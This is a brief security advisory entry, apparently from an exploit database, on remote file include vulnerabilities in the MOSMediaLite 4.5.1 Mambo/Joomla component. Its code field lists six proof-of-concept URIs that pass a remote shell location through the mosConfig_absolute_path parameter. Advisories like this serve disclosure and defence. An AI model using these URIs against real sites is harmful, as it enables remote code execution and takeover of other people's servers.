exploits , vulnerabilities , articles , Mambo/Joomla MOSMediaLite MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Title	Mambo/Joomla MOSMediaLite MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Published	2007-10-08-12:00AM
Updated	2007-10-09-10:48PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	k1n9k0ng is credited with the discovery of this vulnerability.
Vulnerable	MOSMediaLite MOSMediaLite 4.5.1
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
TXT